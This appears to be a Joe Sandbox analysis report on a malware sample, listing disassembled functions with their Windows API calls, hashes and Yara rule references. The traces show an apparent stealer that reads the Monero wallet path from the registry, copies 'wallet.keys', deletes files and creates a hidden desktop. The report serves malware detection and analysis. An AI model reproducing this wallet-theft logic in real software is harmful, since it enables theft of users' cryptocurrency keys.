Instruction Fuzzy Hash: 14F090B1940618AFCB10CF84EC45FD9F77DFB48A20F40466AF90593280D7786A04CAE5

Function 02479A93 Relevance: 107.7, APIs: 86, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

free.MSVCRT ref: 02479AA7
free.MSVCRT ref: 02479AAF
free.MSVCRT ref: 02479AB7
free.MSVCRT ref: 02479ABF
free.MSVCRT ref: 02479AC7
free.MSVCRT ref: 02479ACF
free.MSVCRT ref: 02479AD6
free.MSVCRT ref: 02479ADE
free.MSVCRT ref: 02479AE6
free.MSVCRT ref: 02479AEE
free.MSVCRT ref: 02479AF6
free.MSVCRT ref: 02479AFE
free.MSVCRT ref: 02479B06
free.MSVCRT ref: 02479B0E
free.MSVCRT ref: 02479B16
free.MSVCRT ref: 02479B1E
free.MSVCRT ref: 02479B29
free.MSVCRT ref: 02479B31
free.MSVCRT ref: 02479B39
free.MSVCRT ref: 02479B41
free.MSVCRT ref: 02479B49
free.MSVCRT ref: 02479B51
free.MSVCRT ref: 02479B59
free.MSVCRT ref: 02479B61
free.MSVCRT ref: 02479B69
free.MSVCRT ref: 02479B71
free.MSVCRT ref: 02479B79
free.MSVCRT ref: 02479B81
free.MSVCRT ref: 02479B89
free.MSVCRT ref: 02479B91
free.MSVCRT ref: 02479B99
free.MSVCRT ref: 02479BA1
free.MSVCRT ref: 02479BAF
free.MSVCRT ref: 02479BBA
free.MSVCRT ref: 02479BC5
free.MSVCRT ref: 02479BD0
free.MSVCRT ref: 02479BDB
free.MSVCRT ref: 02479BE6
free.MSVCRT ref: 02479BF1
free.MSVCRT ref: 02479BFC
free.MSVCRT ref: 02479C07
free.MSVCRT ref: 02479C12
free.MSVCRT ref: 02479C1D
free.MSVCRT ref: 02479C28
free.MSVCRT ref: 02479C33
free.MSVCRT ref: 02479C3E
free.MSVCRT ref: 02479C49
free.MSVCRT ref: 02479C54
free.MSVCRT ref: 02479C62
free.MSVCRT ref: 02479C6D
free.MSVCRT ref: 02479C78
free.MSVCRT ref: 02479C83
free.MSVCRT ref: 02479C8E
free.MSVCRT ref: 02479C99
free.MSVCRT ref: 02479CA4
free.MSVCRT ref: 02479CAF
free.MSVCRT ref: 02479CBA
free.MSVCRT ref: 02479CC5
free.MSVCRT ref: 02479CD0
free.MSVCRT ref: 02479CDB
free.MSVCRT ref: 02479CE6
free.MSVCRT ref: 02479CF1
free.MSVCRT ref: 02479CFC
free.MSVCRT ref: 02479D07
free.MSVCRT ref: 02479D15
free.MSVCRT ref: 02479D20
free.MSVCRT ref: 02479D2B
free.MSVCRT ref: 02479D36
free.MSVCRT ref: 02479D41
free.MSVCRT ref: 02479D4C
free.MSVCRT ref: 02479D57
free.MSVCRT ref: 02479D62
free.MSVCRT ref: 02479D6D
free.MSVCRT ref: 02479D78
free.MSVCRT ref: 02479D83
free.MSVCRT ref: 02479D8E
free.MSVCRT ref: 02479D99
free.MSVCRT ref: 02479DA4
free.MSVCRT ref: 02479DAF
free.MSVCRT ref: 02479DBA
free.MSVCRT ref: 02479DC8
free.MSVCRT ref: 02479DD3
free.MSVCRT ref: 02479DDE
free.MSVCRT ref: 02479DE9
free.MSVCRT ref: 02479DF4
free.MSVCRT ref: 02479DFF

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
Instruction ID: 25ccdc7a3585142c73b27dc457187980b5ec13dd69410e12a0fe7934a43395b8
Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
Instruction Fuzzy Hash: 6071D631411B049BD7A33B32DD01ACAF6A37F04701FD0491E91FA2ADB49EA26965DF51

Function 02468971 Relevance: 66.4, APIs: 44, Instructions: 387stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(?), ref: 024689A3

Part of subcall function 02474287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 024742B4
Part of subcall function 02474287: lstrcpy.KERNEL32(00000000,?), ref: 024742E9

StrStrA.SHLWAPI(?,00638C08), ref: 024689C8
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 024689E7
lstrlen.KERNEL32(?), ref: 024689FA
wsprintfA.USER32 ref: 02468A0A
lstrcpy.KERNEL32(?,?), ref: 02468A20
StrStrA.SHLWAPI(?,00638C94), ref: 02468A4D
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 02468A74
lstrlen.KERNEL32(?), ref: 02468A87
wsprintfA.USER32 ref: 02468A97
lstrcpy.KERNEL32(?,006393D0), ref: 02468AAD
StrStrA.SHLWAPI(?,00638C5C), ref: 02468ADA
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 02468AF9
lstrlen.KERNEL32(?), ref: 02468B0C
wsprintfA.USER32 ref: 02468B1C
lstrcpy.KERNEL32(?,?), ref: 02468B32
StrStrA.SHLWAPI(?,00638ABC), ref: 02468B5F
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 02468B7E
lstrlen.KERNEL32(?), ref: 02468B91
wsprintfA.USER32 ref: 02468BA1
lstrcpy.KERNEL32(?,?), ref: 02468BB7
StrStrA.SHLWAPI(?,00638AD0), ref: 02468BE4
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 02468C0B
lstrlen.KERNEL32(?), ref: 02468C1E
wsprintfA.USER32 ref: 02468C2E
lstrcpy.KERNEL32(?,006393D0), ref: 02468C44
StrStrA.SHLWAPI(?,0063891C), ref: 02468C71
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 02468C90
lstrlen.KERNEL32(?), ref: 02468CA3
wsprintfA.USER32 ref: 02468CB3
lstrcpy.KERNEL32(?,?), ref: 02468CC9
StrStrA.SHLWAPI(?,00638D3C), ref: 02468CF6
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 02468D15
lstrlen.KERNEL32(?), ref: 02468D28
wsprintfA.USER32 ref: 02468D38
lstrcpy.KERNEL32(?,?), ref: 02468D4E
StrStrA.SHLWAPI(?,00638B34), ref: 02468D7B
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 02468DA2
lstrlen.KERNEL32(?), ref: 02468DB5
wsprintfA.USER32 ref: 02468DC5
lstrcpy.KERNEL32(?,006393D0), ref: 02468DDB
lstrlen.KERNEL32(?), ref: 02468E00
lstrcpy.KERNEL32(00000000,?), ref: 02468E35
strtok_s.MSVCRT ref: 02468F12

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcpynwsprintf$FolderPathstrtok_s
String ID:
API String ID: 2042561329-0
Opcode ID: 0e757f730b442b6b043138a9859d54580db3b09a1fb68e8a6a4e1378d116aa89
Instruction ID: 06a8ee65f4ad5f3e76bcc67260bf2aab5d1619e4f2ce88bee8ca15169e1ccf56
Opcode Fuzzy Hash: 0e757f730b442b6b043138a9859d54580db3b09a1fb68e8a6a4e1378d116aa89
Instruction Fuzzy Hash: BBE15EB1A00618AFDB10DF74DD48AEA77BAEF48340F10415AF909A7350DBB0AE45CFA1

Function 024520E0 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 02452106
lstrlen.KERNEL32(006389F0), ref: 02452115
lstrcpy.KERNEL32(00000000,?), ref: 02452142
lstrcat.KERNEL32(00000000,?), ref: 0245214A
lstrlen.KERNEL32(00431D64), ref: 02452155
lstrcpy.KERNEL32(00000000,00000000), ref: 02452175
lstrcat.KERNEL32(00000000,00431D64), ref: 02452181
lstrcpy.KERNEL32(00000000,?), ref: 024521A9
lstrcat.KERNEL32(00000000,00000000), ref: 024521B4
lstrlen.KERNEL32(00431D64), ref: 024521BF
lstrcpy.KERNEL32(00000000,00000000), ref: 024521DC
lstrcat.KERNEL32(00000000,00431D64), ref: 024521E8
lstrcpy.KERNEL32(00000000,00000000), ref: 02452213
lstrlen.KERNEL32(?), ref: 0245224B
lstrcpy.KERNEL32(00000000,00000000), ref: 0245226B
lstrcat.KERNEL32(00000000,?), ref: 02452279
lstrcpy.KERNEL32(00000000,00000000), ref: 024522A0
lstrlen.KERNEL32(00431D64), ref: 024522B2
lstrcpy.KERNEL32(00000000,00000000), ref: 024522D2
lstrcat.KERNEL32(00000000,00431D64), ref: 024522DE
lstrcpy.KERNEL32(00000000,00000000), ref: 02452304
lstrcat.KERNEL32(00000000,00000000), ref: 0245230F
lstrcpy.KERNEL32(00000000,00000000), ref: 0245233B
lstrlen.KERNEL32(?), ref: 02452351
lstrcpy.KERNEL32(00000000,00000000), ref: 02452371
lstrcat.KERNEL32(00000000,?), ref: 0245237F
lstrcpy.KERNEL32(00000000,00000000), ref: 024523A9
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024523E6
lstrlen.KERNEL32(00638CA4), ref: 024523F4
lstrcpy.KERNEL32(00000000,00000000), ref: 02452418
lstrcat.KERNEL32(00000000,00638CA4), ref: 02452420
lstrcpy.KERNEL32(00000000,00000000), ref: 0245245E
lstrcat.KERNEL32(00000000), ref: 0245246B
lstrcpy.KERNEL32(00000000,00000000), ref: 02452494
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 024524BD
lstrcpy.KERNEL32(00000000,00000000), ref: 024524E9
lstrcpy.KERNEL32(00000000,00000000), ref: 02452526
DeleteFileA.KERNEL32(00000000), ref: 0245255E
FindNextFileA.KERNEL32(00000000,?), ref: 024525AB
FindClose.KERNEL32(00000000), ref: 024525BA

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
String ID:
API String ID: 2857443207-0
Opcode ID: d5fdf3581800270d76cd737130c6eb2ed7cec78ee1207b2e831536629e65eb1a
Instruction ID: 7e5ef5cee44a709006197f26d6a17ca20e1c2aac7c47d8e583add6967d2bf9ce
Opcode Fuzzy Hash: d5fdf3581800270d76cd737130c6eb2ed7cec78ee1207b2e831536629e65eb1a
Instruction Fuzzy Hash: 3AE12071A0166A9BDB21EF75CC84A9E77BAAF44308F04446BEC45A7212DBB4DD01DFA0

Function 00401070 Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 278stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040108A

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401015
Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000), ref: 0040101C
Part of subcall function 00401000: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00401039
Part of subcall function 00401000: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401053
Part of subcall function 00401000: RegCloseKey.ADVAPI32(?), ref: 0040105D

lstrcatA.KERNEL32(?,00000000), ref: 004010A0
lstrlenA.KERNEL32(?), ref: 004010AD
lstrcatA.KERNEL32(?,.keys), ref: 004010C8
lstrcpy.KERNEL32(00000000,0042D01C), ref: 004010FF
lstrlenA.KERNEL32(009083D0), ref: 0040110D
lstrcpy.KERNEL32(00000000,?), ref: 00401131
lstrcatA.KERNEL32(00000000,009083D0), ref: 00401139
lstrlenA.KERNEL32(\Monero\wallet.keys), ref: 00401144
lstrcpy.KERNEL32(00000000,00000000), ref: 00401168
lstrcatA.KERNEL32(00000000,\Monero\wallet.keys), ref: 00401174
lstrcpy.KERNEL32(00000000,00000000), ref: 0040119A
lstrcpy.KERNEL32(00000000,0042D01C), ref: 004011DF
lstrlenA.KERNEL32(0090ECC0), ref: 004011EE
lstrcpy.KERNEL32(00000000,?), ref: 00401215
lstrcatA.KERNEL32(00000000,?), ref: 0040121D
lstrcpy.KERNEL32(00000000,00000000), ref: 00401258
lstrcatA.KERNEL32(00000000), ref: 00401265
lstrcpy.KERNEL32(00000000,00000000), ref: 0040128C
CopyFileA.KERNEL32(?,?,00000001), ref: 004012B5
lstrcpy.KERNEL32(00000000,?), ref: 004012E1
lstrcpy.KERNEL32(00000000,?), ref: 0040131D

Part of subcall function 0041EF30: lstrcpy.KERNEL32(00000000,?), ref: 0041EF62

DeleteFileA.KERNEL32(?), ref: 00401351
memset.MSVCRT ref: 0040136E

Strings

\Monero\wallet.keys, xrefs: 0040113F, 0040116E
.keys, xrefs: 004010BC

Memory Dump Source

Source File: 00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1974878121.0000000000443000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000048E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000496000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CC000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000506000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000513000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000532000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000005B9000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000638000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000064A000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$FileHeapmemset$AllocCloseCopyDeleteOpenProcessQueryValue
String ID: .keys$\Monero\wallet.keys
API String ID: 2734118222-3586502688
Opcode ID: 9eda4a6cc88766a33cd02c84d7baa0a0e4ec5d0bc14cb39f866b325505556883
Instruction ID: 95442954b0c09f74f01b2627741839e7c598bf71559ee3eba0e7726b6ccc06b1
Opcode Fuzzy Hash: 9eda4a6cc88766a33cd02c84d7baa0a0e4ec5d0bc14cb39f866b325505556883
Instruction Fuzzy Hash: F0A15E71A002059BCB10AFB5DD89A9F77B9AF48304F44417AF905F72E1DB78DD018BA8

Function 02465E47 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 02465E7C
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 02465EAB
lstrcpy.KERNEL32(00000000,00000000), ref: 02465EDC
lstrcpy.KERNEL32(00000000,00000000), ref: 02465F04
lstrcat.KERNEL32(00000000,00000000), ref: 02465F0F
lstrcpy.KERNEL32(00000000,00000000), ref: 02465F37
lstrcpy.KERNEL32(00000000,00000000), ref: 02465F6F
lstrcat.KERNEL32(00000000,00000000), ref: 02465F7A
lstrcpy.KERNEL32(00000000,00000000), ref: 02465F9F
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02465FD5
lstrcpy.KERNEL32(00000000,00000000), ref: 02465FFD
lstrcat.KERNEL32(00000000,00000000), ref: 02466008
lstrcpy.KERNEL32(00000000,00000000), ref: 0246602F
lstrlen.KERNEL32(00431D64), ref: 02466041
lstrcpy.KERNEL32(00000000,00000000), ref: 02466060
lstrcat.KERNEL32(00000000,00431D64), ref: 0246606C
lstrlen.KERNEL32(00638DD8), ref: 0246607B
lstrcpy.KERNEL32(00000000,00000000), ref: 0246609E
lstrcat.KERNEL32(00000000,00000000), ref: 024660A9
lstrcpy.KERNEL32(00000000,00000000), ref: 024660D3
lstrcpy.KERNEL32(00000000,00000000), ref: 024660FF
GetFileAttributesA.KERNEL32(00000000), ref: 02466106
lstrcpy.KERNEL32(00000000,?), ref: 0246615E
lstrcpy.KERNEL32(00000000,?), ref: 024661CD
lstrcpy.KERNEL32(00000000,?), ref: 024661FF
lstrcpy.KERNEL32(00000000,?), ref: 02466242
lstrcpy.KERNEL32(00000000,00000000), ref: 0246626E
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024662A6
lstrcpy.KERNEL32(00000000,?), ref: 02466318
lstrcpy.KERNEL32(00000000,00000000), ref: 0246633C

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
String ID:
API String ID: 2428362635-0
Opcode ID: 0aebda3382d32583c439ff0c954a19649f8748e18a2acc4a857f1244698f8087
Instruction ID: 5a4436bcda4701808aae31cec921212c97d5148d96f75c4101a742f8ab5a294e
Opcode Fuzzy Hash: 0aebda3382d32583c439ff0c954a19649f8748e18a2acc4a857f1244698f8087
Instruction Fuzzy Hash: 1A029F70A016659FDB21EF79CC88AAE7BBAAF44304F04452AEC45A7351CB78DD41CFA1

Function 02466B07 Relevance: 43.9, APIs: 29, Instructions: 437stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 02466B3C
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02466B77
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02466BA1
lstrcpy.KERNEL32(00000000,00000000), ref: 02466BD8
lstrcpy.KERNEL32(00000000,00000000), ref: 02466BFD
lstrcat.KERNEL32(00000000,00000000), ref: 02466C05
lstrcpy.KERNEL32(00000000,00000000), ref: 02466C2E

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$FolderPathlstrcat
String ID:
API String ID: 2938889746-0
Opcode ID: 86e5a9f99d952dc1f974e146edebfde16251fc6fa497a5deb16344c4399cf01b
Instruction ID: ce728e92c32e908b250f403cc41c946b96023756e8fd995d41b295d21bf05835
Opcode Fuzzy Hash: 86e5a9f99d952dc1f974e146edebfde16251fc6fa497a5deb16344c4399cf01b
Instruction Fuzzy Hash: BFF17E70A0066A9BDB21EF79CC48ABE77BAAF44308F05452BEC4597351DB78D901CF92

Function 02464987 Relevance: 39.3, APIs: 26, Instructions: 334stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 024649BA
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024649ED
lstrcpy.KERNEL32(00000000,?), ref: 02464A15
lstrcat.KERNEL32(00000000,00000000), ref: 02464A20
lstrlen.KERNEL32(004352B8), ref: 02464A2B
lstrcpy.KERNEL32(00000000,00000000), ref: 02464A48
lstrcat.KERNEL32(00000000,004352B8), ref: 02464A54
lstrcpy.KERNEL32(00000000,00000000), ref: 02464A7D
lstrcat.KERNEL32(00000000,00000000), ref: 02464A88
lstrcpy.KERNEL32(00000000,00000000), ref: 02464AAF
lstrcpy.KERNEL32(00000000,?), ref: 02464AEE
lstrcat.KERNEL32(00000000,?), ref: 02464AF6
lstrlen.KERNEL32(00431D64), ref: 02464B01
lstrcpy.KERNEL32(00000000,00000000), ref: 02464B1E
lstrcat.KERNEL32(00000000,00431D64), ref: 02464B2A
lstrlen.KERNEL32(004352CC), ref: 02464B35
lstrcpy.KERNEL32(00000000,00000000), ref: 02464B52
lstrcat.KERNEL32(00000000,004352CC), ref: 02464B5E
lstrcpy.KERNEL32(00000000,00000000), ref: 02464B85
lstrcpy.KERNEL32(00000000,?), ref: 02464BB7
GetFileAttributesA.KERNEL32(00000000), ref: 02464BBE
lstrcpy.KERNEL32(00000000,?), ref: 02464C18
lstrcpy.KERNEL32(00000000,?), ref: 02464C41
lstrcpy.KERNEL32(00000000,?), ref: 02464C6A
lstrcpy.KERNEL32(00000000,?), ref: 02464C92
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02464CC6

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
String ID:
API String ID: 1033685851-0
Opcode ID: 3860177a80801d667d4d5f47abfe203d36ef156e54d336ed77d13172b69f2413
Instruction ID: 7a696b0fbdb4b52a2ccc0ff8c7a29f2a7fcd474b9c65fb3410366a9399cc0dc0
Opcode Fuzzy Hash: 3860177a80801d667d4d5f47abfe203d36ef156e54d336ed77d13172b69f2413
Instruction Fuzzy Hash: C8B17070A0166A9BDB31EF75CD48A6F7BA6AF04708F04042BEC45A7351DB74D801DFA5

Function 02471E37 Relevance: 39.2, APIs: 26, Instructions: 192stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02476627: GetProcAddress.KERNEL32(006390E0,00638DC8), ref: 02476680
Part of subcall function 02476627: GetProcAddress.KERNEL32(006390E0,00638E44), ref: 02476699
Part of subcall function 02476627: GetProcAddress.KERNEL32(006390E0,00638A64), ref: 024766B1
Part of subcall function 02476627: GetProcAddress.KERNEL32(006390E0,00638A50), ref: 024766C9
Part of subcall function 02476627: GetProcAddress.KERNEL32(006390E0,00638AF8), ref: 024766E2
Part of subcall function 02476627: GetProcAddress.KERNEL32(006390E0,00638CD4), ref: 024766FA
Part of subcall function 02476627: GetProcAddress.KERNEL32(006390E0,00638B3C), ref: 02476712
Part of subcall function 02476627: GetProcAddress.KERNEL32(006390E0,00638DA0), ref: 0247672B
Part of subcall function 02476627: GetProcAddress.KERNEL32(006390E0,00638D48), ref: 02476743
Part of subcall function 02476627: GetProcAddress.KERNEL32(006390E0,00638BBC), ref: 0247675B
Part of subcall function 02476627: GetProcAddress.KERNEL32(006390E0,00638AE8), ref: 02476774
Part of subcall function 02476627: GetProcAddress.KERNEL32(006390E0,00638E0C), ref: 0247678C
Part of subcall function 02476627: GetProcAddress.KERNEL32(006390E0,006388B0), ref: 024767A4

lstrcpy.KERNEL32(00000000,0042D01C), ref: 02471E76
GetUserDefaultLangID.KERNEL32 ref: 02471E7C

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: AddressProc$DefaultLangUserlstrcpy
String ID:
API String ID: 4154271814-0
Opcode ID: e9ed414595d713c08b5737fb47b7d7df39434625f9a60a04fbd9816609dc5aed
Instruction ID: f8a19fba347c7e9f039a132de46d926c2d005f205bbffdd034f65f6de958dceb
Opcode Fuzzy Hash: e9ed414595d713c08b5737fb47b7d7df39434625f9a60a04fbd9816609dc5aed
Instruction Fuzzy Hash: C461A130500656AFD721AF71DC88BAF7ABBAF45749F04102AFD1993261DFB49801DFA0

Function 02459A03 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 238stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,?), ref: 02459A3F
lstrcat.KERNEL32(?,?), ref: 02459A54
lstrcat.KERNEL32(?,0043516C), ref: 02459A67

Part of subcall function 02474077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024740AC
Part of subcall function 02474077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024740D6
Part of subcall function 02474077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02451495,?,0000001A), ref: 024740E0

wsprintfA.USER32 ref: 02459AAD
OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 02459AD0
CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 02459AEF
memset.MSVCRT ref: 02459B0D
lstrcat.KERNEL32(?,?), ref: 02459B22
lstrcat.KERNEL32(?,?), ref: 02459B34
lstrcat.KERNEL32(?,00435128), ref: 02459B44
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 02459B81
lstrcpy.KERNEL32(00000000,?), ref: 02459BB7
StrStrA.SHLWAPI(?,00638C5C), ref: 02459BCC
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 02459BE9
lstrlen.KERNEL32(?), ref: 02459BFD
wsprintfA.USER32 ref: 02459C0D
lstrcpy.KERNEL32(?,?), ref: 02459C24
memset.MSVCRT ref: 02459C3A

Strings

D, xrefs: 02459C51

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$Desktopmemsetwsprintf$CreateFolderOpenPathSystemTimelstrcpynlstrlen
String ID: D
API String ID: 171495903-2746444292
Opcode ID: 036bfe3e640b0c580a25b4da69415942ed3f07c3761777f5e0f98e8c3392593a
Instruction ID: d7d2b05f4fafe267770bad57c3555417dab3893a7e262658b7244b79d7077541
Opcode Fuzzy Hash: 036bfe3e640b0c580a25b4da69415942ed3f07c3761777f5e0f98e8c3392593a
Instruction Fuzzy Hash: 3C915FB1604744AFE720DF74DC45F9A77E9AF88704F10891EFA8987291DBB0A504CFA2

Function 02459A07 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 235stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,?), ref: 02459A3F
lstrcat.KERNEL32(?,?), ref: 02459A54
lstrcat.KERNEL32(?,0043516C), ref: 02459A67

Part of subcall function 02474077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024740AC
Part of subcall function 02474077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024740D6
Part of subcall function 02474077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02451495,?,0000001A), ref: 024740E0

wsprintfA.USER32 ref: 02459AAD
OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 02459AD0
CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 02459AEF
memset.MSVCRT ref: 02459B0D
lstrcat.KERNEL32(?,?), ref: 02459B22
lstrcat.KERNEL32(?,?), ref: 02459B34
lstrcat.KERNEL32(?,00435128), ref: 02459B44
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 02459B81
lstrcpy.KERNEL32(00000000,?), ref: 02459BB7
StrStrA.SHLWAPI(?,00638C5C), ref: 02459BCC
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 02459BE9
lstrlen.KERNEL32(?), ref: 02459BFD
wsprintfA.USER32 ref: 02459C0D
lstrcpy.KERNEL32(?,?), ref: 02459C24
memset.MSVCRT ref: 02459C3A

Strings

D, xrefs: 02459C51

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$Desktopmemsetwsprintf$CreateFolderOpenPathSystemTimelstrcpynlstrlen
String ID: D
API String ID: 171495903-2746444292
Opcode ID: 310418aebbb9667b23ffe003a4651859814da30904e8aad52300771c551470ab
Instruction ID: 21bafdb4b0a159519ec3921fe0aa76e8418fa4388ff39ebf642ddd4eb42b9cb0
Opcode Fuzzy Hash: 310418aebbb9667b23ffe003a4651859814da30904e8aad52300771c551470ab
Instruction Fuzzy Hash: 9A915EB1604344AFE720DF74DC45F9A77E9AF88704F10891EFA8987291DBB0A504CFA2

Function 024512D7 Relevance: 36.3, APIs: 24, Instructions: 278stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 024512F1

Part of subcall function 02451267: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0245127C
Part of subcall function 02451267: RtlAllocateHeap.NTDLL(00000000), ref: 02451283
Part of subcall function 02451267: RegOpenKeyExA.ADVAPI32(80000001,00431D24,00000000,00020119,?), ref: 024512A0
Part of subcall function 02451267: RegQueryValueExA.ADVAPI32(?,00431D18,00000000,00000000,00000000,000000FF), ref: 024512BA
Part of subcall function 02451267: RegCloseKey.ADVAPI32(?), ref: 024512C4

lstrcat.KERNEL32(?,00000000), ref: 02451307
lstrlen.KERNEL32(?), ref: 02451314
